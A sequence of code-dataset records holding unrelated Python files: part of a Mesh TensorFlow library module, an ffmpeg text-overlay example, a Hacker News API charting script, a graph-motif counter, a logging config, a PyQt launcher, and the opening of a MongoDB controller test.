e.g. \"ij,jk->ik\"\n\n  Args:\n    input_shapes: a list of Shapes\n    output_shape: a Shape\n  Returns:\n    a string\n  \"\"\"\n  ret = []\n  next_letter = ord(\"a\")\n  dim_to_letter = {}\n  for shape_num, shape in enumerate(input_shapes + [output_shape]):\n    if shape_num == len(input_shapes):\n      ret.append(\"->\")\n    elif shape_num > 0:\n      ret.append(\",\")\n    for d in shape.dims:\n      if d not in dim_to_letter:\n        dim_to_letter[d] = chr(next_letter)\n        next_letter += 1\n      ret.append(dim_to_letter[d])\n\n  return \"\".join(ret)\n\n\ndef is_subsequence(short_seq, long_seq):\n  \"\"\"Whether short_seq is a subsequence of long_seq.\"\"\"\n  if not short_seq:\n    return True\n  pos = 0\n  for x in long_seq:\n    if pos == len(short_seq):\n      return True\n    if short_seq[pos] == x:\n      pos += 1\n  if pos == len(short_seq):\n    return True\n  return False\n\n\ndef verify_no_new_dims(input_shapes, output_shape):\n  \"\"\"Verifies that all dimensions in the output are in at least one input.\n\n  Args:\n    input_shapes: a list of Shapes\n    output_shape: a Shape\n  Raises:\n    ValueError: if there are new dimensions in the output.\n  \"\"\"\n  all_input_dims = set(sum([s.dims for s in input_shapes], []))\n  all_output_dims = set(output_shape.dims)\n  if not all_output_dims.issubset(all_input_dims):\n    raise ValueError(\n        \"No new dimensions allowed in output\"\n        \" input_shapes = %s output_shape= %s\"\n        % ([s.dims for s in input_shapes], output_shape.dims))\n\n\ndef pnum_to_processor_coordinates(mesh_shape, pnum):\n  \"\"\"Coordinates of a processor in the mesh.\n\n  Args:\n    mesh_shape: a Shape\n    pnum: an integer less than mesh_shape.size\n\n  Returns:\n    a list of integers with length len(mesh_shape)\n  \"\"\"\n  ret = []\n  for dimsize in mesh_shape.to_integer_list[::-1]:\n    ret.append(pnum % dimsize)\n    pnum //= dimsize\n  return ret[::-1]\n\n\ndef processor_coordinates_to_pnum(mesh_shape, coord):\n  \"\"\"Inverse of pnum_to_processor_coordinates.\n\n  Args:\n    mesh_shape: a Shape\n    coord: a list of integers with length len(mesh_shape)\n\n  Returns:\n    an integer less than mesh_shape.size\n  \"\"\"\n  ret = 0\n  multiplier = 1\n  for c, d in zip(coord[::-1], mesh_shape.to_integer_list[::-1]):\n    ret += multiplier * c\n    multiplier *= d\n  return ret\n\n\ndef 
pnum_to_group(mesh_shape, group_dims, pnum):\n \"\"\"Group number for grouped allreduce.\n\n Args:\n mesh_shape: a Shape\n group_dims: a list of integers (the dimensions reduced over)\n pnum: an integer\n\n Returns:\n an integer\n \"\"\"\n coord = pnum_to_processor_coordinates(mesh_shape, pnum)\n remaining_shape = Shape(\n [d for i, d in enumerate(mesh_shape) if i not in group_dims])\n remaining_coord = [d for i, d in enumerate(coord) if i not in group_dims]\n return processor_coordinates_to_pnum(remaining_shape, remaining_coord)\n\n\ndef processor_groups(mesh_shape, group_dims):\n \"\"\"Groups of processors which differ only in the given dimensions.\n\n Args:\n mesh_shape: a Shape\n group_dims: a list of integers\n\n Returns:\n a list of lists of integers (processor numbers)\n \"\"\"\n group_numbers = [\n pnum_to_group(mesh_shape, group_dims, pnum)\n for pnum in xrange(mesh_shape.size)]\n ret = []\n for pnum, g in enumerate(group_numbers):\n while len(ret) <= g:\n ret.append([])\n ret[g].append(pnum)\n return ret\n\n\ndef list_product(l):\n return reduce(mul, l, 1)\n\n\ndef log_softmax(x, reduced_dim, name=None):\n \"\"\"log(softmax(x)).\n\n Args:\n x: a Tensor whose shape contains vocab_dim\n reduced_dim: a Dimension\n name: an optional string\n\n Returns:\n a Tensor with the same shape as x\n \"\"\"\n reduced_dim = convert_to_dimension(reduced_dim)\n with tf.variable_scope(name, default_name=\"log_softmax\"):\n reduced_shape = x.shape - reduced_dim\n max_logit = reduce_max(stop_gradient(x), output_shape=reduced_shape)\n x -= max_logit\n exp_x = exp(x)\n sum_exp_x = reduce_sum(exp_x, output_shape=reduced_shape)\n log_denom = log(sum_exp_x)\n return x - log_denom\n\n\ndef softmax(x, reduced_dim, name=None):\n with tf.variable_scope(name, default_name=\"softmax\"):\n return exp(log_softmax(x, reduced_dim))\n\n\ndef range(mesh, dim, dtype, name=None): # pylint: disable=redefined-builtin\n \"\"\"Create a 1d mesh tensor with a range from [0, dim.size).\n\n Args:\n mesh: a Mesh\n dim: a Dimension\n dtype: a tf.DType\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n dim = convert_to_dimension(dim)\n with tf.variable_scope(name, default_name=\"range\"):\n return import_tf_tensor(\n mesh, tf.range(dim.size, dtype=dtype), shape=Shape([dim]))\n\n\ndef pretty_print_counters(counters):\n \"\"\"print counters hierarchically.\n\n Each counter is a pair of a string and a number.\n The string can have slashes, meaning that the number also counts towards\n each prefix. e.g. \"parameters/trainable\" counts towards both \"parameters\"\n and \"parameters/trainable\".\n\n Args:\n counters: a list of (string, number) pairs\n\n Returns:\n a string\n \"\"\"\n totals = collections.defaultdict(int)\n for (name, val) in counters:\n prefixes = [name[:i] for i in xrange(len(name)) if name[i] == \"/\"] + [name]\n for p in prefixes:\n totals[p] += val\n parts = []\n for name, val in sorted(six.iteritems(totals)):\n parts.append(\" \" * name.count(\"/\") + \"%s: %.3g\" % (name, val))\n return \"\\n\".join(parts)\n\n\ndef _parse_string_to_list_of_pairs(s, seconds_to_int=False):\n r\"\"\"Parses a string into a list of pairs.\n\n In the input string, each pair is separated by a colon, and the delimiters\n between pairs are any of \" ,.;\".\n\n e.g. \"rows:32,cols:32\"\n\n Args:\n s: str to parse.\n seconds_to_int: Boolean. 
If True, then the second elements are returned\n as integers; otherwise they are strings.\n\n Returns:\n List of tuple pairs.\n\n Raises:\n ValueError: Badly formatted string.\n \"\"\"\n ret = []\n for p in [s.split(\":\") for s in re.sub(\"[,.;]\", \" \", s).split()]:\n if len(p) != 2:\n raise ValueError(\"bad input to _parse_string_to_list_of_pairs %s\" % s)\n if seconds_to_int:\n ret.append((p[0], int(p[1])))\n else:\n ret.append(tuple(p))\n return ret\n\n\ndef parallel(devices, fn, *args, **kwargs):\n \"\"\"Call a function once on each device.\n\n Args:\n devices: a list of n devices\n fn: a function\n *args: arguments, each of which is a list of length n\n **kwargs: keyword-args, each of which is a list of length n\n Returns:\n a list of length n\n Raises:\n ValueError: if the arguments are not all lists of length n\n \"\"\"\n if not isinstance(devices, list):\n raise ValueError(\"devices must be a list\")\n for x in list(args) + list(six.itervalues(kwargs)):\n if not isinstance(x, list) or len(x) != len(devices):\n raise ValueError(\n \"Argument not a list with same length as devices \"\n \"arg=%s devices=%s %s %s\" % (x, devices, len(x), len(devices)))\n ret = []\n for i, device in enumerate(devices):\n with tf.device(device):\n with tf.variable_scope(\"parallel_%d\" % i):\n my_args = [x[i] for x in args]\n my_kwargs = {k: v[i] for k, v in six.iteritems(kwargs)}\n ret.append(fn(*my_args, **my_kwargs))\n return ret\n\n\ndef transpose_list_of_lists(lol):\n \"\"\"Transpose a list of equally-sized python lists.\n\n Args:\n lol: a list of lists\n Returns:\n a list of lists\n Raises:\n ValueError: if list is empty\n \"\"\"\n if not lol:\n raise ValueError(\"cannot transpose the empty list\")\n return [list(x) for x in zip(*lol)]\n\n\ndef binary_reduction_fn(reduction_fn_string):\n if reduction_fn_string == \"SUM\":\n return tf.add\n elif reduction_fn_string == \"MAX\":\n return tf.maximum\n elif reduction_fn_string == \"MIN\":\n return tf.minimum\n else:\n raise ValueError(\"Unknown reduction_fn_string %s\" % reduction_fn_string)\n\n\ndef reduction_fn(reduction_fn_string):\n if reduction_fn_string == \"SUM\":\n return tf.reduce_sum\n elif reduction_fn_string == \"MAX\":\n return tf.reduce_max\n elif reduction_fn_string == \"MIN\":\n return tf.reduce_min\n else:\n raise ValueError(\"Unknown reduction_fn_string %s\" % reduction_fn_string)\n\n\nclass MtfCheckpointSaverListener(tf.train.CheckpointSaverListener):\n \"\"\"Copy slices to masters before saving.\"\"\"\n\n def __init__(self, lowering):\n self._op = lowering.copy_slices_to_masters()\n\n def begin(self):\n # You can add ops to the graph here.\n tf.logging.info(\"Starting the session.\")\n\n def before_save(self, session, global_step_value):\n # assigns\n tf.logging.info(\"Before Save.\")\n session.run(self._op)\n tf.logging.info(\"About to write a checkpoint\")\n\n def after_save(self, session, global_step_value):\n tf.logging.info(\"Done writing checkpoint.\")\n\n def end(self, session, global_step_value):\n tf.logging.info(\"Done with the session.\")\n\n\nclass MtfRestoreHook(tf.train.SessionRunHook):\n \"\"\"Copy masters to slices after restoring.\"\"\"\n\n def __init__(self, lowering):\n self._lowering = lowering\n\n def begin(self):\n self._op = self._lowering.copy_masters_to_slices()\n\n def after_create_session(self, session, coord):\n session.run(self._op)\n\n\nclass RandomOperation(Operation):\n \"\"\"Random operation such as tf.random_uniform.\"\"\"\n\n def __init__(self, mesh, shape, tf_fn, **kwargs):\n 
super(RandomOperation, self).__init__(\n [], mesh=mesh, name=kwargs.get(\"name\", \"random\"))\n self._tf_fn = tf_fn\n self._kwargs = kwargs\n self._outputs = [Tensor(self, shape, kwargs.get(\"dtype\", tf.float32))]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n output_shape = self.outputs[0].shape\n lowering.set_tensor_lowering(self.outputs[0], (\n mesh_impl.random(output_shape, self._tf_fn, self._kwargs)))\n\n\ndef random_uniform(mesh, shape, **kwargs):\n \"\"\"Random uniform.\n\n Args:\n mesh: a Mesh\n shape: a Shape\n **kwargs: keyword args for tf.random_uniform, except seed\n\n Returns:\n a Tensor\n \"\"\"\n shape = convert_to_shape(shape)\n return RandomOperation(mesh, shape, tf.random_uniform, **kwargs).outputs[0]\n\n\ndef dropout(x, keep_prob, noise_shape=None, name=None):\n \"\"\"Dropout layer.\n\n Args:\n x: a Tensor\n keep_prob: a float between 0.0 and 1.0\n noise_shape: an optional Shape (a subset of x.shape)\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n noise_shape = convert_to_shape(noise_shape)\n if noise_shape is None:\n noise_shape = x.shape\n with tf.variable_scope(name, default_name=\"dropout\"):\n if keep_prob == 1.0:\n return x\n noise = cast(less(random_uniform(\n x.mesh, noise_shape, dtype=x.dtype), keep_prob), x.dtype)\n noise /= keep_prob\n return x * noise\n\n\ndef _cumprod(l):\n \"\"\"Cumulative product of a list.\n\n Args:\n l: a list of integers\n Returns:\n a list with one more element (starting with 1)\n \"\"\"\n ret = [1]\n for item in l:\n ret.append(ret[-1] * item)\n return ret\n\n\ndef log_variable_sizes(var_list, tag, verbose=True):\n \"\"\"Log the sizes and shapes of variables, and the total size.\n\n Args:\n var_list: a list of variables; defaults to trainable_variables\n tag: a string; defaults to \"Trainable Variables\"\n verbose: bool, if True, log every weight; otherwise, log total size only.\n \"\"\"\n if not var_list:\n return\n\n name_to_var = {v.name: v for v in var_list}\n total_size = 0\n for v_name in sorted(list(name_to_var)):\n v = name_to_var[v_name]\n v_size = v.shape.size\n if verbose:\n tf.logging.info(\"Weight %s\\tshape %s\\tsize %d\",\n v.name.ljust(80),\n str(v.shape).ljust(30), v_size)\n total_size += v_size\n tf.logging.info(\"%s Total size: %d\", tag, total_size)\n\n\nclass WhileLoopOperation(Operation):\n \"\"\"While loop.\"\"\"\n\n def __init__(self, cond_fn, body_fn, inputs,\n tf_kwargs=None, name=\"while_loop\"):\n super(WhileLoopOperation, self).__init__(\n inputs, mesh=inputs[0].mesh, name=name)\n self._cond_fn = cond_fn\n self._body_fn = body_fn\n self._tf_kwargs = tf_kwargs or {}\n assert not self._tf_kwargs.get(\"back_prop\", False)\n ops = self.graph.operations\n before = len(ops)\n def make_placeholders(name):\n return [Tensor(self, t.shape, t.dtype, name=\"%s_%d\" % (name, i))\n for i, t in enumerate(inputs)]\n self._cond_inputs = make_placeholders(\"cond_input\")\n self._cond_output = self._cond_fn(*self._cond_inputs)\n self._cond_ops = ops[before:]\n del ops[before:]\n self._body_inputs = make_placeholders(\"body_input\")\n self._body_outputs = self._body_fn(*self._body_inputs)\n for (i, (inp, body_out)) in enumerate(zip(inputs, self._body_outputs)):\n if inp.shape != body_out.shape:\n raise ValueError(\n \"shape mismatch i=%d inp=%s body_out=%s\" % (i, inp, body_out))\n self._body_ops = ops[before:]\n del ops[before:]\n self._outputs = make_placeholders(\"output\")\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n def tf_cond_fn(*tf_inputs):\n for 
tf_inp, mtf_inp in zip(tf_inputs, self._cond_inputs):\n lowering.tensors[mtf_inp] = mesh_impl.LaidOutTensor(tf_inp)\n for op in self._cond_ops:\n with tf.name_scope(op.name):\n op.lower(lowering)\n lowered_output = lowering.tensors[self._cond_output]\n ret = lowered_output.to_laid_out_tensor().tensor_list[0]\n return ret\n\n def tf_body_fn(*tf_inputs):\n for tf_inp, mtf_inp in zip(tf_inputs, self._body_inputs):\n lowering.tensors[mtf_inp] = mesh_impl.LaidOutTensor(tf_inp)\n for op in self._body_ops:\n with tf.name_scope(op.name):\n op.lower(lowering)\n return [\n lowering.tensors[mtf_out].to_laid_out_tensor().tensor_list\n for mtf_out in self._body_outputs]\n\n lowered_inputs = [\n lowering.tensors[t].to_laid_out_tensor().tensor_list\n for t in self.inputs]\n\n tf_outs = tf.while_loop(tf_cond_fn,\n tf_body_fn,\n lowered_inputs,\n back_prop=False,\n **self._tf_kwargs)\n for tf_out, mtf_out in zip(tf_outs, self._outputs):\n lowering.set_tensor_lowering(mtf_out, mesh_impl.LaidOutTensor(tf_out))\n\n\ndef while_loop(cond_fn, body_fn, inputs, num_loop_vars=None, **kwargs):\n \"\"\"While Loop.\n\n num_loop_vars is a hack for the multi-gpu setup. In this case, loops\n are generally slow, as all loop variables are placed on device. By setting\n num_loop_vars=k, then all of the loop variables except for the first k\n are handled as mtf Variables instead of loop variables, using explicit\n updates and control dependencies. In this case, we only return the\n first num_loop_vars outputs. Do not use this option on TPU, since it\n is unnecessary and also produces incorrect results, since xla does not\n respect control dependencies.\n\n Args:\n cond_fn: a function from n Tensors to scalar boolean Tensor\n body_fn: a function from n Tensors to n Tensors\n inputs: a list of n Tensors\n num_loop_vars: an optional integer.\n **kwargs: additional kwargs passed to tf.while_loop\n\n Returns:\n a list of n Tensors.\n \"\"\"\n if num_loop_vars is None:\n return WhileLoopOperation(cond_fn, body_fn, inputs, kwargs).outputs\n # Turn all loop vars except for the first ones into non-loop vars.\n # see comments in docstring.\n assert num_loop_vars > 0\n extra_inputs = inputs[num_loop_vars:]\n my_vars = tuple([get_variable(\n x.mesh, \"loop_var_%d\" % i,\n x.shape, initializer=tf.zeros_initializer(),\n dtype=x.dtype,\n collections=[tf.GraphKeys.LOCAL_VARIABLES])\n for i, x in enumerate(extra_inputs)])\n first_input = depend(\n inputs[0], [assign(var, x) for var, x in zip(my_vars, extra_inputs)])\n inputs = [first_input] + inputs[1:num_loop_vars]\n def my_cond_fn(*inputs):\n return cond_fn(*(inputs + my_vars))\n def my_body_fn(*inputs):\n outputs = tuple(body_fn(*(inputs + my_vars)))\n extra_outputs = outputs[num_loop_vars:]\n first_output = depend(\n outputs[0], [assign(var, x) for var, x in zip(my_vars, extra_outputs)])\n outputs = (first_output,) + outputs[1:num_loop_vars]\n return outputs\n return WhileLoopOperation(\n my_cond_fn, my_body_fn, inputs, kwargs).outputs\n\n\ndef where(condition, if_true, if_false):\n dtype = if_true.dtype\n return (\n if_true * cast(condition, dtype) +\n if_false * cast(logical_not(condition), dtype))\n\n\ndef _shape_union(shapes):\n \"\"\"A shape containing the union of all dimensions in the input shapes.\n\n Args:\n shapes: a list of Shapes\n\n Returns:\n a Shape\n \"\"\"\n return Shape(list(set(sum([s.dims for s in shapes], []))))\n\n\ndef _tf_flatten_batch_dims(x, num_nonbatch_dims):\n \"\"\"Flatten all but last num_nonbatch_dims into one dimension.\n\n Args:\n x: a tf.Tensor:\n 
num_nonbatch_dims: an integer\n\n Returns:\n a tf.Tensor with 1 + num_nonbatch_dims dimensions.\n \"\"\"\n shape = x.shape.as_list()\n assert None not in shape\n new_shape = ([list_product(shape[:-num_nonbatch_dims])]\n + shape[-num_nonbatch_dims:])\n if new_shape != shape:\n x = tf.reshape(x, new_shape)\n return x\n\n\ndef _tf_restore_batch_dims(x, num_nonbatch_dims, prototype):\n \"\"\"Reverse op of _tf_flatten_batch_dims.\n\n Un-flatten the first dimension of x to match all but the last\n num_nonbatch_dims dimensions of prototype.\n\n Args:\n x: a tf.Tensor with 1 + num_nonbatch_dims dimensions\n num_nonbatch_dims: an integer\n prototype: a tf.Tensor\n\n Returns:\n a tf.Tensor\n \"\"\"\n assert x.shape.ndims == 1 + num_nonbatch_dims\n new_shape = (\n prototype.shape.as_list()[:-num_nonbatch_dims] + x.shape.as_list()[1:])\n assert None not in new_shape\n if new_shape != x.shape.as_list():\n x = tf.reshape(x, new_shape)\n return x\n\n\ndef halo_exchange(x, blocks_dim, block_size_dim, halo_size, wrap=False):\n \"\"\"Concat each block with the margins of adjacent blocks.\n\n Get left and right blocks_dim and concatenate along block_size_dim.\n\n Args:\n x: a Tensor.\n blocks_dim: a Dimension in x.shape\n block_size_dim: a Dimension in x.shape\n halo_size: an integer\n wrap: a boolean\n\n Returns:\n a Tensor with the same shape as x, other than in block_size_dim, whose\n size is increased by 2*halo_size.\n \"\"\"\n if halo_size == 0:\n return x\n\n block_size = block_size_dim.size\n partial_size = halo_size % block_size\n num_complete_blocks = halo_size // block_size\n parts = [x]\n\n for i in xrange(1, num_complete_blocks + 1):\n parts = ([shift(x, i, blocks_dim, wrap)] + parts +\n [shift(x, -i, blocks_dim, wrap)])\n if partial_size > 0:\n left_margin = slice(x, 0, partial_size, block_size_dim.name)\n right_margin = slice(x, block_size_dim.size - partial_size, partial_size,\n block_size_dim.name)\n parts = (\n [shift(right_margin, num_complete_blocks + 1, blocks_dim, wrap)]\n + parts +\n [shift(left_margin, -(num_complete_blocks + 1), blocks_dim, wrap)])\n return concat(parts, block_size_dim.name)\n\n\ndef conv2d_with_blocks(\n conv_input,\n conv_filter,\n strides,\n padding,\n h_blocks_dim=None,\n w_blocks_dim=None,\n name=None):\n \"\"\"conv2d operation with spatial partitioning.\n\n Spatial partitioning is implemented by decomposing the image into blocks.\n Block dimensions represented as h_blocks_dim and w_blocks_dim can be split\n along the mesh axis. If split, then we do a halo exchange where each block\n receives the part of the image from its left and right neighbors necessary to\n do the convolution. Exchange can involve complete or partial blocks depending\n on the filter height and width.\n\n Currently, only \"SAME\" padding with dilation rate of 1 is supported.\n\n Args:\n conv_input: a Tensor of shape\n [batch, h_blocks_dim, w_blocks_dim, h_dim, w_dim, in_channels_dim]\n conv_filter: a Tensor of shape\n [filter_height, filter_width, in_channels_dim, out_channels_dim]\n strides: A list of ints. 1-D tensor of length 4.\n padding: string, \"SAME\". 
The type of padding algorithm to use.\n      \"VALID\" is not currently supported.\n    h_blocks_dim: Dimension representing number of height blocks.\n    w_blocks_dim: Dimension representing number of width blocks.\n    name: A name for the operation (optional).\n\n  Returns:\n    A Tensor of shape\n      [batch, h_blocks_dim, w_blocks_dim, h_dim, w_dim, out_channels_dim]\n  \"\"\"\n  filter_h_dim, filter_w_dim = conv_filter.shape.dims[:2]\n  assert filter_h_dim.size % 2 == 1\n  assert filter_w_dim.size % 2 == 1\n  h_dim, w_dim = conv_input.shape.dims[-3:-1]\n\n  # If h_blocks_dim and w_blocks_dim are not split, directly call conv2d.\n  if h_blocks_dim is None and w_blocks_dim is None:\n    return conv2d(conv_input, conv_filter, strides, padding, name)\n\n  # Padding 'VALID' is not supported yet.\n  if padding != \"SAME\":\n    raise NotImplementedError(\"conv2d_with_blocks requires padding=SAME\")\n\n  # Halo exchange for h_blocks and w_blocks.\n  for blocks_dim, block_size_dim, halo_size in [\n      (h_blocks_dim, h_dim, filter_h_dim.size // 2),\n      (w_blocks_dim, w_dim, filter_w_dim.size // 2)]:\n    if halo_size > 0:\n      if blocks_dim is not None:\n        conv_input = halo_exchange(\n            conv_input, blocks_dim, block_size_dim, halo_size)\n      else:\n        conv_input = pad(\n            conv_input, [halo_size, halo_size], block_size_dim.name)\n  return conv2d(conv_input, conv_filter, strides, \"VALID\", name)\n","repo_name":"Sanqiang/text_simplification","sub_path":"tensor2tensor/mesh_tensorflow/mesh_tensorflow.py","file_name":"mesh_tensorflow.py","file_ext":"py","file_size_in_byte":126593,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"70"}
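The processor-numbering helpers in the record above are plain mixed-radix arithmetic, so they can be checked in isolation. A minimal standalone sketch, using plain Python lists instead of mtf Shapes; the function names here are local stand-ins, not the library's API:

```python
# Mixed-radix encode/decode behind pnum_to_processor_coordinates and
# processor_coordinates_to_pnum: the last mesh dimension varies fastest.

def pnum_to_coords(mesh_shape, pnum):
    """Decode a processor number into one coordinate per mesh dimension."""
    coords = []
    for dimsize in mesh_shape[::-1]:
        coords.append(pnum % dimsize)
        pnum //= dimsize
    return coords[::-1]

def coords_to_pnum(mesh_shape, coords):
    """Inverse: fold coordinates back into a single processor number."""
    pnum, multiplier = 0, 1
    for c, d in zip(coords[::-1], mesh_shape[::-1]):
        pnum += multiplier * c
        multiplier *= d
    return pnum

mesh_shape = [2, 3, 4]  # 2 * 3 * 4 = 24 processors
assert all(coords_to_pnum(mesh_shape, pnum_to_coords(mesh_shape, p)) == p
           for p in range(24))
print(pnum_to_coords(mesh_shape, 11))  # [0, 2, 3]
```

The round-trip assertion is exactly why `pnum` must be less than the product of the mesh dimension sizes, as the corrected docstrings above state.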
+{"seq_id":"72801003108","text":"import ffmpeg\ninput = ffmpeg.input('https://ma7moud3ly.github.io/video.mp4')\n\ntext=input.drawtext(text='Pink Python ^_^',\nfontcolor='red',\nfontsize=30,\nbox=1,\nboxcolor='black@0.5',\nx='(w-text_w)/2',\ny='(h-text_h)/2'\n)\n\ntext=text.drawtext(text='By Mahmoud Aly',\nfontcolor='white',\nfontsize=15,\nx='(w-text_w)/2',\ny='((h-text_h)/2)+30'\n)\n\noutput=ffmpeg.output(text, 'text.mp4')\nffmpeg.run(output,overwrite_output=True)\n\n","repo_name":"Ma7moud3ly/pink-python","sub_path":"scripts/packages/ffmpeg4.py","file_name":"ffmpeg4.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"34002820520","text":"import requests\nfrom operator import itemgetter\nimport pygal\nfrom pygal.style import LightenStyle as LS , LightColorizedStyle as LCS\n\n# Wykonanie zapytania API i zachgwania otrzymanej odpowiedzi.\nurl = 'https://hacker-news.firebaseio.com/v0/topstories.json'\nr = requests.get(url)\nprint(\"Kod stanu:\", r.status_code)\n\n#Przetworzenie informacji o każdym artykule\n\nsubmission_ids = r.json()\nsubmission_dicts = []\n\nfor submission_id in submission_ids[:30]:\n # Przygotowanie oddzielnego wywołania API dla każdego artykułu.\n url = ('https://hacker-news.firebaseio.com/v0/item/' + str(submission_id) + '.json')\n submission_r = requests.get(url)\n print(submission_r.status_code)\n response_dict = submission_r.json()\n\n submission_dict = {\n 'title' : response_dict['title'],\n 'link' : 'http://news.ycombinator.com/item?id=' + str(submission_id),\n 'comments' : response_dict.get('descendants', 0)\n }\n submission_dicts.append(submission_dict)\n\nsubmission_dicts = sorted(submission_dicts, key = itemgetter('comments'), reverse=True)\n\nfor submission_dict in submission_dicts:\n print(\"\\nTytuł artykułu: \", submission_dict['title'])\n print(\"Łącze dyskusji: \", submission_dict['link'])\n print(\"Liczba Komentarzy: \", submission_dict['comments'])\n\ntitle, plot_discts = [], []\nfor submission_dict in submission_dicts:\n title.append(submission_dict['title'])\n\n plot_dict = {\n 'value': submission_dict['comments'],\n 'xlink': submission_dict['link']\n }\n plot_discts.append(plot_dict)\n\n\n\n# Utworzenie wizualizacji.\nmy_style = LS('#336699', base_style=LCS)\n\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 18\nmy_config.truncate_label = 15\nmy_config.show_y_guides = False\nmy_config.width = 1000\n\nchart = pygal.Bar(my_config, style=my_style)\nchart.force_uri_protocol = 'http'\nchart.title = \"Najpopularniejsze ze względu na liczbę komentarzy, posty na stronie internetowej https://hacker-news.firebaseio.com \"\nchart.x_labels = title\n\nchart.add('', plot_discts)\nchart.render_to_file('hn_submissions.svg')","repo_name":"ahilon/Python-matplotlib-API-pygal","sub_path":"API/RequestApiHackerNews/hn_submissions.py","file_name":"hn_submissions.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41044670130","text":"import itertools\r\nfrom tqdm import tqdm\r\nimport networkx as nx\r\n\r\n\r\n# count all the motifs in a graph of size n\r\ndef countMotifs(graph, size):\r\n allMotifs = []\r\n motifCount = 0\r\n for i in tqdm(range(size-1, size*(size-1)+1)):\r\n curMotifs = [] # tuple that contains graphs and their motifs count\r\n combinations = [list(x) for x in itertools.combinations(graph.edges(), i)] # all edges combinations\r\n for combination in combinations:\r\n curGraph = nx.DiGraph()\r\n curGraph.add_edges_from(combination)\r\n if len(curGraph.nodes) != size:\r\n continue\r\n if not nx.is_connected(curGraph.to_undirected()):\r\n continue\r\n is_isomorphic = any(nx.is_isomorphic(contender[0], curGraph) for contender in curMotifs)\r\n if is_isomorphic:\r\n for j, contender in enumerate(curMotifs):\r\n if nx.is_isomorphic(contender[0], curGraph):\r\n temp = list(curMotifs[j])\r\n temp[1] += 1\r\n curMotifs[j] = tuple(temp)\r\n break\r\n else:\r\n curMotifs.append((curGraph, 1))\r\n motifCount += 1\r\n allMotifs.append(curMotifs)\r\n\r\n return allMotifs, motifCount\r\n\r\n# print graph edges\r\ndef printMotifs(edges):\r\n strToPrint = \"\"\r\n for edge in edges:\r\n strToPrint += f\"{edge[0]} {edge[1]}\\n\"\r\n return strToPrint\r\n\r\n\r\ndef printToTerminal(motifs, count):\r\n strToPrint = \"\"\r\n i = 1\r\n strToPrint += f\"count={count}\\n\"\r\n strToPrint += f\"total motifs={count}\\n\"\r\n for lst in motifs:\r\n for motif in lst:\r\n strToPrint += f\"#{i}\\n\"\r\n strToPrint += f\"count={motif[1]}\\n\"\r\n i += 1\r\n strToPrint += printMotifs(motif[0].edges)\r\n print(strToPrint)\r\n\r\n\r\n# parse the graph and start the program\r\ndef parseAndStart(graph_str, n):\r\n edges_str_arr = graph_str.split(\"\\n\")\r\n new_edges = [(int(edge.split(\" \")[0]), int(edge.split(\" \")[1])) for edge in edges_str_arr if edge]\r\n # create a graph\r\n g = nx.DiGraph()\r\n g.add_edges_from(new_edges)\r\n # count motifs\r\n motifs, count = countMotifs(g, n)\r\n # print to terminal\r\n printToTerminal(motifs, count)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # get n from user\r\n n = int(input(\"Enter the value of n: \"))\r\n # get graph from file\r\n with open(\"input.txt\", \"r\") as file:\r\n graph_str = file.read()\r\n # parse and start\r\n parseAndStart(graph_str, n)\r\n\r\n\r\n","repo_name":"YanaiLevi/BioComp","sub_path":"ex2q2.py","file_name":"ex2q2.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18440148085","text":"import logging.config\n\nfrom ebonite.config import Logging\n\nLOG_LEVEL = logging._nameToLevel.get(Logging.LOG_LEVEL, logging.DEBUG)\n\nlogging_config = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'\n },\n },\n 'handlers': {\n 'default': {\n 'level': LOG_LEVEL,\n 'formatter': 'standard',\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://sys.stdout',\n },\n },\n 'loggers': {\n 'ebonite': {\n 'handlers': ['default'],\n 'level': LOG_LEVEL,\n },\n 'ebonite_runtime': {\n 'handlers': ['default'],\n 'level': LOG_LEVEL\n }\n }\n}\n\nlogging.config.dictConfig(logging_config)\n\nlogger = logging.getLogger('ebonite')\nrlogger = logging.getLogger('ebonite_runtime')\n","repo_name":"zyfra/ebonite","sub_path":"src/ebonite/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"69"}
+{"seq_id":"11156736442","text":"#!/usr/bin/python\n#-*-coding: utf-8-*-\n \nfrom lector import *\nfrom gui import *\n \n \n \ndef main():\n app = QtGui.QApplication(sys.argv)\n main_window = MainWindow()\n sys.exit(app.exec_())\n \nif __name__ == '__main__':\n main()","repo_name":"MartinezLopez/gestor_libros","sub_path":"gestor_libros/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35327884820","text":"# -*- coding: utf-8 -*-\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest # NOQA\n\nimport os\nimport sys\nfrom tests.base import MongoTestCase\nimport json\nimport time\nfrom random import randint\nfrom bson import ObjectId\nimport models\nimport controllers\nfrom models.extensions import validate, validate_partial, doc_remove_empty_keys\nfrom schematics.serialize import to_python\nfrom utils import myyaml\n\nclass TestGenericMongo(MongoTestCase):\n def post_sample(self, doc):\n response = controllers.Generic(self.g).post(**{'docs': [doc]})\n assert response['status'] == 200\n return response['response']['docs'][0]['doc']\n def test_post_attr(self):\n '''Post a new item to a listType attribute/field\n '''\n db = self.g['db']\n usr = self.g['usr'] \n generic = controllers.Generic(self.g)\n\n # lets create a some sample docs bypassing tmp process.\n sample_doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 